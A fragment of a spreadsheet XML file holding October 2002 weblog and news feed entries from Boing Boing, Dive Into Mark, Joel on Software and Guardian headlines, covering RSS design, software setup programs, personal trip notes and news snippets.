might just watch Top of the Pops this week." Link[1] Discuss[2] (_Thanks, 
Feorag[3]!_)[1] http://news.bbc.co.uk/1/hi/entertainment/music/2304155.stm
[2] http://www.quicktopic.com/boing/H/qNF789XLAj4p7
[3] http://www.antipope.org/feorag/e-prattle/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.oblomovka.com/entries/2002/10/07#1034055900
Date: 2002-10-07T22:45:00-0700... for not updating: I'm doing the guestblog at Boing Boing[1]. Now to find an 
excuse for missing last week.[1] http://www.boingboing.net/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534626
Date: Not suppliedAfter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Becauseï¿½and this is the point of all that war-driving and 
    -chalking and node-stumblingï¿½when you get used to wireless, the experience 
    feels more and more like a God-given right. One day we may breathe 
    bandwidth like oxygenï¿½and arguing its illegality will be unthinkable.  Link[1] Discuss[2] (_Thanks, Steven[3]!_)[1] http://www.msnbc.com/news/816606.asp
[2] http://www.quicktopic.com/boing/H/f5ZpuJU5975K
[3] http://www.echonyc.com/~steven/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655712,215/
Date: 2002-10-08T03:30:54+01:00*Medicine and health: *The discovery of the myriad little deaths which lead to 
life brought the most coveted prize in world medicine to two Britons and an 
American yesterday.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655714,215/
Date: 2002-10-08T03:30:52+01:00*Business: *The long-awaited recovery in Britain's manufacturing sector ground 
to a halt in August, despite a sharp rise in car production, official figures 
showed yesterday.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/08.html#barney_not_found
Date: 2002-10-08T22:41:03-05:00Microsoft Knowledge Base Article Q172668: Barney Fun on Imagination Island 
Error Message: Barney Not Found[1]. Microsoft ActiMates Interactive Barney may 
conflict with a wide range of radio-operated electronic devices, including 
burglar alarms, resulting in the dreaded â€œBarney Not Foundâ€ error. 
To resolve this problem, Microsoft recommends turning off your burglar alarm. Incidentally, this is the funniest MS KBase article I've seen since Earth 
Rotates in Wrong Direction[2].[1] http://support.microsoft.com/default.aspx?scid=KB;EN-US;Q172668&amp;
[2] http://support.microsoft.com/default.aspx?scid=KB;EN-US;Q131109&amp;
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/08.html#movable_type_25_is_out
Date: 2002-10-08T20:52:08-05:00Movable Type 2.5 is out. I'm running it and it appears to work. It incorporates 
many suggestions from Dive Into Accessibility[1], a book which was written in 
and is still powered by Movable Type. I find this amusing in a self-referential 
sort of way. The other big change is the inclusion of MT-search to allow users to have their 
own site search. Every web site needs a site search[2]. Existing MT-search 
users should merge the contents of mt-search.cfg into mt.cfg, change 
"TemplateDir" to "SearchTemplatePath", and (if you use alternate templates) 
change "AltTemplate1", "AltTemplate2", "AltTemplate3", etc. to "AltTemplate". 
They should all just be "AltTemplate". - Download MT 2.5[3]. 
- MT 2.5 changelog[4]. [1] http://diveintoaccessibility.org/
[2] http://diveintoaccessibility.org/day_29_making_everything_searchable.html
[3] http://www.movabletype.org/25/
[4] http://www.movabletype.org/docs/mtchanges.html#2.5 (2002.10.08)
</t>
  </si>
  <si>
    <t>URL: http://www.aaronsw.com/weblog/000647
Date: 2002-10-08T16:39:48-06:00=== Scissors ===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10-inch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can't 
go on board." "I don't remember packing that," I said. I let her confiscate it. I called my Mom. She doesn't remember packing it either. Is there some sort of 
terrorist plot to plant scissors in innocent-looking people's suitcases? I 
can't see why this would be useful. How would they know what plane I'm on? Once 
I'm on the plane how would they get the scissors? They could threaten me, but 
if they have a threatening implement already, then why do they need the 
scissors? Perhaps it's some sort of Matroishca-doll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 Waiting for Wireless === Now I am at O'Hare Airport, sitting outside the Admiral's Club while 
businessmen walk in and out. I am looking for a wireless signal, the signal I 
used last time I was here, but not finding it. Of course, last time I was here, 
I had an Admiral's Club card. This time I have a Mileage Plus Card, but despite 
the airline ologopoly--or perhaps because of it (have to keep up appearances, 
you know)--I doubt they will accept it. === Irony === According to the announcement I just heard, Mr. Valenti is going to miss his 
flight. I think of what I'd say if I ran into him. "Jack!" I'd exclaim, as if we were 
old pals. "Going to the Eldred case?" Of course he was. "Going to be a good 
one." "Hey, remember when you had that debate with Lessig?" I'd ask. "You said 
you were starting a new task force to make movies legitimately available on the 
Internet. What ever happened to that?" I imagine him mumbling and looking down 
at his watch. His plane is going to leave soon; he has to run. Another announcement: Mr. Michael McKenna needs to call his office. Good thing 
these airline announcements keep me up to date. === Automatic Flush Toilets === Now I am short and the sensing system was mounted up tall in both instances. In 
the first, at my old high school (where you think some people might be a little 
short...), the flush went off once accidentally. OK, I thought, I can handle 
one mistake. Then it went off again. Here at the airport, it misfired three 
times. This is annoying and inexcusable. Have they not heard of user testing? Do they 
expect only tall people to use these bathrooms? This problem must be remedied 
immediately. I recommend releasing a Service Pack on the manufacturer's web 
site. === Arrival === I've arrived in D.C.--once again, I'm sitting a block away from my hotel on the 
sidewalk borrowing someone's connection. Trip was very smooth, had lunch with 
Lisa and went to the Spy Museum (pretty cool, but could have been better). Now 
for the meetings and parties. Sorry for not responding to your email. I'm rather busy. ;-)</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/08.html#in_praise_of_evolvable_formats
Date: 2002-10-08T12:28:10-05:00_Clay Shirky_: In Praise of Evolvable Systems[1]. This entire article could be 
rewritten to explain RSS. In fact, let's do that. If it were April Fool's Day, the Net's only official holiday, and you wanted to 
design a â€œnovelty formatâ€ to slip by the W3C as a joke, it might 
look something like RSS 0.9x/2.0: - It would specify limits on data values, then remove them, then specify 
required elements, then make them optional, thus silently breaking an unknown 
number of parsers around the world. 
- It would encourage use of entity-encoded HTML in its most important element, 
thus ensuring both security risks and unpredictable display for the end user. 
- It would ignore years of standards work in other fields, committing such 
egregious sins as defining a guid element that wasn't a GUID, and using an 
obsolete date format that couldn't easily be sorted by date. 
- Its primary method of extensibility would be to add new elements to the core 
namespace without telling anyone or documenting them, thus making it wholely 
resistant to DTD, schema, or validation of any kind. 
- After years of worldwide deployment, it would completely reverse its 
add-whatever-you-want extensibility rules in favor of namespaces, which the 
spec would neither define nor elaborate on. 
-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0.9x and 2.0 are the Whoopee Cushion and Joy Buzzer of syndication formats. 
For anyone who has tried to accomplish anything serious with metadata, it's 
pretty obvious that of the various implementations of a worldwide syndication 
format, we have the worst one possible. Except, of course, for all the others. The problem with that list of RSS deficiencies is that it is also a list of 
necessitiesâ€”RSS has flourished in a way that no other syndication format 
has, not despite many of these qualities but because of them. The very 
weaknesses that make RSS so infuriating to serious practitioners also make it 
possible in the first place. - Removing length limitations on description and making title optional opened 
up RSS to a whole new category of producer: the weblogger. 
-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 Few publishing tools can produce real conforming GUIDs, and it doesn't 
matter, because virtually all RSS parsers are written in high level languages 
where handling strings is more efficient than converting strings to bytecodes 
and handling bytecodes. As for dates, by convention an RSS document is laid out 
in reverse chronological order, and no one seems to be clamoring for more 
flexibility. Furthermore, its almost babyish XML syntax, so far from any serious 
computational framework (Where are the namespaces? Where is the Document Type 
Description? Why is the aggregators' enforcement of conformity so lax?), made 
it possible for anyone wanting an RSS feed to write one. The effects of this 
ease of implementation only become clear when you compare it to the attempts 
over the years to â€œdo RSS rightâ€â€”most notably RSS 1.0 in the 
year 2000. RSS 1.0 had three main benefits: - Backward compatible with RSS 0.90, which was never widely deployed, and which 
fell into obscurity as soon as (the much simpler) RSS 0.91 was introduced. 
- Based on RDF (specifically a serialization called RDF/XML), a spec which, at 
the time and to this day, continues to change or threaten to change. Two years 
later, there are no major languages or development platforms that ship with 
parsers to consume RDF, although many (Perl, Python, .NET) have third-party RDF 
parsers in various states of development and conformance. (The release version 
is generally out of date; CVS access is recommended. You get the idea.) 
Meanwhile, RDF/XML production tools are so inconsistent that even RDF experts 
recommend not using RDF tools to produce an RSS 1.0 feed if you want it to 
actually be read by any major RSS aggregator. Despite the two-year-old promise 
of better tools[2], it is now the year 2002, and I built my RSS 1.0 
feedâ€”in the most sophisticated personal publishing system in the 
worldâ€”by manually typing a mishmash of template tags and angle brackets 
into a TEXTAREA of an HTML form. 
- Extensible through namespaces, which, as mentioned above, have been 
haphazardly and poorly incorporated into RSS 2.0, where they appear to be 
flourishing. Evolvable formatsâ€”those that proceed by being adapted and extended in a 
thousand small waysâ€”have three main characteristics that are germane to 
their eventual victories over strong, centrally designed formats. - Only solutions that produce partial results with imperfect tools can succeed. 
My RSS feed is an XML document produced by a template that I built in a 
TEXTAREA, and consumed by hundreds of parsers around the world that know 
nothing of XML and hack apart my feed with regular expressions. The world is 
littered with formats that would have worked if only everyone had better tools. 
If everyone in the world had a perfect RDF parser at their disposal, it would 
be trivial to produce and consume all the world's metadata in RDF. Without such 
perfect tools, both production and consumption instantly become nightmares. 
There is no middle ground. 
- What is, is wrong. Because evolvable formats have always been adapted to 
earlier conditions and are always being further adapted to present conditions, 
they are always behind the times. RSS was being stretched with long 
descriptions, optional titles, and entity-encoded HTML even before such 
practices were codified in the spec, and long before all consumers could handle 
them. No evolving format is ever perfectly in sync with the challenges it 
faces. 
- Finally, Orgel's Rule, named for the evolutionary biologist Leslie 
Orgelâ€”â€œEvolution is cleverer than you areâ€. As with the list 
of RSS's obvious deficiencies above, it is easy to point out what is wrong with 
any evolvable system at any point in its life. No one seeing RSS 1.0 and RSS 
0.91 side-by-side could doubt that RSS 1.0 had the superior technology, that it 
â€œdid things rightâ€. However, the ability to understand what is 
missing at any given moment does not mean that one person or a small central 
group can design a better system in the long haul. Designed formats start out strong and improve logarithmically. Evolvable 
formats start out weak and improve exponentially. RSS 2.0 is not the perfect 
syndication format, just the best one that's also currently practical. 
Infrastructure built on evolvable formats will always be partially incomplete, 
partially wrong and ultimately better designed than its competition.[1] http://www.shirky.com/writings/evolve.html
[2] http://groups.yahoo.com/group/syndication/message/467
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541036
Date: Not suppliedYet another Lego obsessive has built a working Lego harpsichord. Tons of points 
for style, but damn, it sounds like hell. Link[1] Discuss[2] (_Thanks, Tim[3]!_
)[1] http://www.henrylim.org/Harpsichord.html
[2] http://www.quicktopic.com/boing/H/HuXcCLLHKEv
[3] http://www.sff.net/people/timpratt/tropism.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541081
Date: Not suppliedTeresa's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Discuss[2][1] http://nielsenhayden.com/makinglight/archives/2002_10.html#001484
[2] http://www.quicktopic.com/boing/H/mUp57FGXT7VJ
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85539452
Date: Not supplied[IMG: http://www.konaweb.com/stick/left.jpg]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side-by-side. Anyway, here's 
a stand-up bass that looks much more portable: the Kona Walkingstick. You still 
need to carry around an amp, though. Link[1] Discuss[2] _(Thanks, Prentiss[3]!)
_
[1] http://www.konaweb.com/stick/index.shtml
[2] http://www.quicktopic.com/17/H/EDukecyrhdW
[3] http://boingboing.net/ï»¿http://www.io.com/~riddle/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688977,215/
Date: 2002-10-09T03:15:13+01:00*Media:* Move could lead to Rupert Murdoch's News Corporation being outvoted on 
major board decisions.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8689493,215/
Date: 2002-10-09T03:46:02+01:00Brown blocks plans for new secure training centres for teenage offenders.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688973,215/
Date: 2002-10-09T03:15:18+01:00*UK latest:* Met blocks Brian Paddick returning to his job as commander of 
Lambeth by appointing him to another post.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85538898
Date: Not supplied[IMG: http://boingboing.net/Images/luckystack1.jpg]Tim Biskup is an artist who 
does a lot of work for animation studios. His work is inspired by one of my 
favorite illustrators, Jim Flora. Tim's selling a deck of poker cards, each 
with a different illo, and they look terrific. Lots of whimsical monsters and 
happy monkeys and weird prehistoric plants. I pre-ordered my deck just now. 
Hurry, only 2500 decks will be printed! Link[1] Discuss[2]
[1] http://www.timbiskup.com/timsite/timpages/luckystack.html
[2] http://www.quicktopic.com/17/H/6E5eribTLCzLD
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85538591
Date: Not supplied[IMG: http://www.craphound.com/images/escherlego.jpg] Lego enthusiasts have 
implemented three of Escher's optical illusion paintings (including "Ascending 
and Descending," pictured here), using Lego! Link[1] Discuss[2] (_via MeFi[3]_) [1] http://www.lipsons.pwp.blueyonder.co.uk/escher/ascending.html
[2] http://www.quicktopic.com/boing/H/gHYxJ6d46EVY
[3] http://www.metafilter.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688976,215/
Date: 2002-10-09T03:15:14+01:00*Football:* It's a safe bet that Kurt Cobain hated sports. And when you look at 
the England football team, it's difficult not to agree with him, writes *Steven 
Wells*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8670380,215/
Date: 2002-10-08T14:51:59+01:00*Business:* Illness and City's mailing of sports empire share are blamed for 
death.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688970,215/
Date: 2002-10-09T03:15:21+01:00PM calls for major arms deal to save Stormont.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541017
Date: Not suppliedThe US Military is planning on equipping Gulf troops with two-way translators: 
Palm-sized devices with speech-recognition and automated translation. Tried 
speech-to-text lately? How about Babelfish? Boy, is this technology ever gonna 
suck: "Take he to that chemistry arm vegetable." Link[1] Discuss[2] (_Thanks, 
Nat[3]!_)[1] http://www.cnn.com/2002/US/Northeast/10/06/handheld.translator.ap/
[2] http://www.quicktopic.com/boing/H/eXMNyidbgPL
[3] http://www.frii.com/~gnat/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688972,215/
Date: 2002-10-09T03:15:19+01:00At 155 metres, Anish Kapoor's sculpture is one of the world's largest.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85540997
Date: Not suppliedKen "Oral Fixation" Starr has a new cause: fighting in the Supreme Court for 
the First Amendment rights of Soth Carolinans to get and give tattoos. Link[1] 
Discuss[2] (_Thanks, Jeremy!_)[1] http://story.news.yahoo.com/news?tmpl=story2&amp;u=/ap/20021007/ap_on_go_su_co/scotus_tattooing&amp;e=1
[2] http://www.quicktopic.com/boing/H/yAyiDLnD6uew
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8677924,1440/
Date: Not suppliedGovernment employees are routinely screened in a bid to spot spies - but the 
testing is useless, says influential panel of scientists
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8676018,1440/
Date: Not suppliedPioneering contributions to astrophysics have provided 'two new windows on the 
Universe'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688975,215/
Date: 2002-10-09T03:15:16+01:00*Tory conference:* Thatcherites cheer former chairman's housing plans.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8668042,1440/
Date: Not suppliedThe virus has wiped most of India's vultures, causing ecological havoc - 
migrating birds could now carry it to Europe and Africa
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8664946,1440/
Date: Not suppliedDamaged forms of the newly identified gene are implicated in many breast and 
lung cancers - new treatments for thousands may result
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8666353,215/
Date: 2002-10-08T12:47:59+01:00*Cartoon: Steve Bell *on the Conservative party conference.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20021008.html
Date: Not suppliedFeedback from my posting[1] about FogBUGZ[2]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there's always a possibility that some step in the middle 
of the batch will fail, and in that case, a well-behaved setup program will 
back out the steps that were already done. There are well over 100 error 
messages in the string table for FogBUGZ Setup so the number of things that can 
fail is not insignificant. Second, it's not nice to tell people about an error in their input three pages 
after they made the mistake. For example, early in the FogBUGZ setup process we 
prompt you to create an account for FogBUGZ to use: [IMG: http://www.joelonsoftware.com/pictures/setupNewAcct.gif (FogBUGZ Setup 
Screenshot)]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didn't know that!). It's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(Microsoft's web server). So 
part one of the batch is "Stop IIS." Now if part 2 fails for some reason, it 
would be _extremely_ rude to leave IIS not running. And anyway, it's not like I 
don't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user's time. Indeed even 
FogBUGZ setup does 95% of its work at the very end. But the "create account" 
operation is so fast, that principle simply doesn't apply here. Even our 95% of 
the work phase takes well under a minute, most of which is spent waiting for 
IIS to stop and start. *"Why did you use VC++/MFC? Surely an advanced intelligence such as yourself 
has admitted by now that Delphi[3] is more productive."* First of all, leave 
your language religious fanaticism at the Usenet door. Somehow I managed 
to figure out_ in high school_ that language advocacy and religious 
arguments are unbelievably boring.  Secondly, even if Delphi were more productive, the only pertinent question, 
since I am writing the code, is _what is more productive for Joel Spolsky_. And 
I don't know Delphi at all, but I know Win32, MFC, and VC++ _really, really 
well_. So while I might not outcode a good Delphi programmer, I would 
definitely outcode a completely inexperienced Delphi programmer (which is me), 
certainly over a short 4 week project. Third, many of the things I needed to do 
in this setup program are things like "grant the Logon as Service privilege to 
an account." This is rare enough that the only way to find out how to do this 
is to search the Microsoft knowlege base and the web in general. When you 
search the web in general for how to do fancy things with Windows NT, what you 
find is about 75% C code, maybe 20% VB code, and 5% everything else. Yes, I 
know, I could translate the C code into Delphi (assuming I was a sophisticated 
Delphi programmer, not a completely inexperienced Delphi programmer), but that 
costs as much productivity as I would supposedly gain from your supposedly more 
productive programming language. And fourth, I already had about 30% of the 
code I needed for Setup in MFC format: from FogBUGZ 2.0 Setup, and a library 
I've been using for years to make wizards. *"Why make Setup at all? You already have your customers' money. Good Setup 
programs don't increase sales."* This was actually the smartest question and 
made me think the hardest. I came up with three reasons: - Decreased tech support cost. This setup program will pay for itself over the 
life of the code. 
- Delight my customers. When I'm trying to get them to upgrade to 4.0, I want 
them to remember how painless the 3.0 installation was, so they won't hesitate 
because they are afraid to upgrade. I'm still using an old version of 
SpamAssassin that is becoming increasingly ineffective, even though I know the 
new version is much better, because I just can't bear the thought of another 
morning wasted. The very memory of the first SpamAssassin installation -- all 
the little SSH windows, some su'ed, trying to scroll through man pages and 
Google Groups, accidentally hitting Ctrl+Z in Emacs to undo and having it 
suspend, trying to guess why we can't get the MTA to run procmail, sorry it's 
too much. If SpamAssassin was making money off of upgraders they would have 
lost my business because they don't have a SETUP program. 
- Win reviews. Software reviewers always cast about for some kind of 
standardized way to rate software, even when they are comparing apples and 
oranges and planets and 17th century philosophers. They always have a 
meaningless list of things to review which can be applied to PC games, 
mainframe databases, web site auction software, and DNA sequencing 
software. And Setup is always on their list. A single flaw in setup is 
guaranteed to be mentioned in every review because every reviewer will see it 
and say "Aha!"
*"How can we make WISE[4] better?" *Kudos to the product manager of WISE 
Installation System for calling me up and listening to my litany of all the 
reasons his product wasn't adequate for typical IIS/ASP/SQL applications.[1] http://www.joelonsoftware.com/news/20021002.html
[2] http://www.fogcreek.com/FogBUGZ
[3] http://discuss.fogcreek.com/delphiquestions
[4] http://www.wise.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541049
Date: Not suppliedBerkeley's Impact Theatre is running a one-man show called "Working for the 
Mouse," which details one man's experiences working at Disneyland. The story of 
the show's poster[1] is pretty funny, too. Link[2] Discuss[3] (_Thanks, Barry!_
)[1] http://www.cheshiredave.com/mastication/2002/10/0041-mouse.html
[2] http://www.impacttheatre.com/season/index.html
[3] http://www.quicktopic.com/boing/H/qmXnPYTBGj3A
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541025
Date: Not suppliedJapanese toilet technology has developed creeping featuritis. New Tokyo toities 
sport speech-recognition, air-conditioning, and body-chemistry monitors:     Japan's toilet wars started in February, when Matsushita engineers here 
    unveiled a toilet seat equipped with electrodes that send a mild electric 
    charge through the user's buttocks, yielding a digital measurement of 
    body-fat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Link[1] Discuss[2] (_Thanks, May[3]!_)[1] http://www.nytimes.com/2002/10/08/international/asia/08JAPA.html
[2] http://www.quicktopic.com/boing/H/MQCtPB8LcUjsc
[3] http://www.filterfine.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8674045,215/
Date: 2002-10-08T16:56:00+01:00*World dispatch:* Bush's arguments strain the limits of plausibility to justify 
war on Iraq, and this, says *Simon Tisdall*, means regime change is imperative 
- in Washington.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541007
Date: Not suppliedNew Scientist is throwing a scavenger hunt with two prizes: "Live forever" and 
get a gift certificate good for cryonic freezing or "Live now" and take a 
luxury trip to Hawai'i. Link[1] Discuss[2] (_Thanks, Jens[3]!_)[1] http://www.newscientist.com/competition/
[2] http://www.quicktopic.com/boing/H/hyPgygjHPrevU
[3] http://www.nosenseofplace.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/10.html#words_fail_me
Date: 2002-10-10T02:34:18-05:00_The Morning News_: Rosencrantz &amp; Joshua[1]. Words fail me, which is a rare 
and pleasant gift, thank you. Instead, I will simply take this opportunity to 
quote the original _Rosencrantz &amp; Guildenstern Are Dead_, the excellent 
play by Tom Stoppard which I keep nestled in my one remaining bookshelf[2] 
between the _Tao Te Ching_ and Roald Dahl's _Charlie and the Chocolate Factory_
.     Guil: Exactly, it's a matter of asking the right questions and giving away 
    as little as we can. It's a game.
    Ros: And then we can go?
    Guil: And receive such thanks as fits a king's remembrance.
    Ros: I like the sound of that. Waht do you think he meant by remembrance?
    Guil: He doesn't forget his friends.
    Ros: Would you care to estimate?
    Guil: Difficult to say, reallyâ€”some kings tend to be amnesiac, others 
    I supposeâ€”the opposite, whatever that is...
    Ros: Yesâ€”butâ€”
    Guil: Elephantine... ?
    Ros: Not how longâ€”how much?
    Guil: _Retentive_â€”he's a very retentive king, a royal retainer...
    Ros: What are you playing at?
    Guil: Words, words. They're all we have to go on. [1] http://www.themorningnews.org/archives/stories/rosencrantz_joshua.shtml
[2] http://diveintomark.org/archives/2002/04/19.html#alan_cooper_speaks
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/09.html#wedding_music
Date: 2002-10-09T23:41:26-05:00It's confirmed: Dora and I will be walking down the aisle to the sounds of the 
Triangle Tuba Quartet[1]. That is just too cool for words.[1] http://www.duke.edu/~ieisen/ttq.html
</t>
  </si>
  <si>
    <t>URL: http://diveintomark.org/archives/2002/10/09.html#six
Date: 2002-10-09T19:54:41-05:00Actually, 5.6. I clocked my â€œlong loopâ€ today and discovered that 
the run I thought was 6 miles is actually only 5.6. And the â€œshort 
loopâ€ I thought was 5 miles is actually only 4.6. I have an off-by-0.4 
bug. This is very upsetting. I've lost 0.4 miles somewhere. If anyone finds 
them, can you please let me know? Thank you. I ran 9 miles last week, and 10 so far this week, even taking into account my 
off-by-0.4 bug. I fear I am turning into a runner. My father and I made fun of 
runners when I was growing up. He used to say that you never saw a runner 
smiling. We'd drive by runners, point at them, and say, â€œLook, another 
runner... not smiling!â€ This weighed heavily on my psyche in my formative 
years. So it is with some measure of shame that I admit that I am becoming a 
runner. Becoming a runner is actually not that difficult. Not surprisingly, it involves 
running. There's other stuff, too, eventually, but running is the important 
part. If you can run a mile, run a mile. If you can only run around the block, 
run around the block. Tomorrow you'll run around the block, and the next day 
you'll find you can run around two blocks. And next week you'll find you can 
run a mile. Then one day you'll run a mile, then stop to catch your breath, 
then get invigorated and run another mile. And then you're a runner. That's it, really. It's not complicated. You run, and 
you run, and you run. And one day, you discover that shoes are important, and 
that the old sneakers you threw on the first time you tried out this running 
thing out aren't actually very good for running. So you go buy new shoes, and 
you run, and you run, and you run. And later, you discover that stretching is 
important too, so you stretch and run, and stretch and run, and stretch and 
run. There's other stuff too, but it doesn't really matter until you're already a 
runner. You learn about differences in running surfaces. And how many miles you 
should really put on one pair of shoes. And when in the day you should run to 
maximize calorie burning. And how to train for a marathon, and so forth. Don't 
worry about any of that now. Just run. Running is key. Otherwise you're just 
another fat schmuck lying on the couch reading _Runner's World_.</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/09.html#five
Date: 2002-10-09T10:25:09-05:00- _OSNews.com_: Red Hat 8.0 for KDE Users (and Newbies)[1]. 
- _Aaron Swartz_: Trip notes[2]. 
- _Sean Palmer_: The Semantic Web in Haiku[3]. 
- _Shelley Powers_: The Parable of the Languages[4]. 
- _Heather Hamilton_: You only get five[5]. (Mira Sorvino[6], Portia de Rossi
[7], Stockard Channing[8], Jeri Ryan[9] Nigella Lawson[10], and Angelina Jolie
[11]. D gave me her list but wouldn't let me post it. Meh.) [1]  http://www.osnews.com/story.php?news_id=1890
[2]  http://www.aaronsw.com/weblog/000647
[3]  http://infomesh.net/2002/swhaiku/
[4]  http://weblog.burningbird.net/archives/000581.php
[5]  http://www.dooce.com/mtarchives/10_08_2002.html
[6]  http://www.elegantwomen.net/mirasorvino/009.html
[7]  http://www.safesearching.com/portiaderossi/gallery/
[8]  http://images.amazon.com/images/P/0792846486.01.LZZZZZZZ.jpg
[9]  http://www.elegantwomen.net/jeriryan/003.html
[10] http://www.stylenetwork.com/Shows/Nigella/Gallery/index.html
[11] http://www.elegantwomen.net/angelinajolie/009.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20021009.html
Date: Not supplied[IMG: http://www.joelonsoftware.com/pictures/dhtml2d.jpg (Dynamic HTML, 2d 
Edition)][1]Ah! Danny Goodman has released the new version of Dynamic HTML[2]. 
It's been a few years since the first edition, which is _still_ the best 
reference on HTML despite being severely out of date. The new edition is 1400 
packed pages that actually tells you what web browsers that are actually in use 
actually do, which makes it invaluable. It has been brought up to date with all 
the latest browsers and the newest HTML specs. If you're working with HTML 
in any way, shape, or form, this book is an absolute requirement.[1] http://www.amazon.com/exec/obidos/tg/detail/-/0596003161/joelonsoftware/ref=nosim
[2] http://www.amazon.com/exec/obidos/tg/detail/-/0596003161/joelonsoftware/ref=nosim
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723991,215/
Date: 2002-10-10T03:27:00+01:00US invasion could push Saddam Hussein into retaliating with chemical or 
biological weapons, warns CIA.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8702434,215/
Date: 2002-10-09T14:04:56+01:00*Rome dispatch: *Italy's 'post-fascist' National Alliance is behind two 
controversial attempts to commemorate the country's military past, writes *
Philip Willan*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723995,215/
Date: 2002-10-10T03:26:56+01:00*Conservative party conference:* Iain Duncan Smith will today tell the Tory old 
guard to stop sniping at his policy agenda.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000231.html
Date: 2002-10-09T22:50:35-08:00My Tivo has been picking up the Twilight Zone for the last few weeks. I have to 
say, I'm really enjoying it. It reminds me of the old ones. It's good to have 
it back on the air....
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8704787,1440/
Date: Not suppliedThe reserve will protect the pristine habitats of a group of sub-Antarctic 
islands described as the "wildest place on Earth"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723992,215/
Date: 2002-10-10T03:26:59+01:00New evidence in case of murdered British tourist Peter Falconio.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8701110,1440/
Date: Not suppliedThree researchers are honoured for pioneering ways of identifying large 
biological molecules such as proteins and DNA
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000230.html
Date: 2002-10-09T22:10:38-08:00I'll be in Ohio this weekend for a family gathering, so I'll be missing Fleet 
Week (Google can't find a good "official site"). Damn. I've wanted to see the 
Blue Angles again. Wow, that site sucks. And Google couldn't find...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8701111,1440/
Date: Not suppliedGovernment employees are routinely screened in a bid to spot spies - but the 
testing is useless, says influential panel of scientists
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000229.html
Date: 2002-10-09T20:59:51-08:00Yeay! We had a good earnings report at work today. There was much happiness and 
a good party after the news. I'm not quite sure how we managed that, but we're 
still making money. I had the distinction of being...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723993,215/
Date: 2002-10-10T03:26:58+01:00Toumai, hailed as our oldest ancestor, is stirring ancient scientific 
rivalries.ï¿½Quizzes[1]ï¿½| Crossword[2]ï¿½| Interactive guides[3]ï¿½| Steve Bell[4]ï¿½| 
Weblog[5]ï¿½*Other news and comment**Blair ready to suspend Stormont*[6][1]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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723994,215/
Date: 2002-10-10T03:26:57+01:00*World latest:* Warning to next PM as Pakistan goes to the polls.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8719499,1440/
Date: Not suppliedSufferers fail to produce effective amounts of key bacteria-killing molecules - 
the discovery raises hopes of new treatments for millions
</t>
  </si>
  <si>
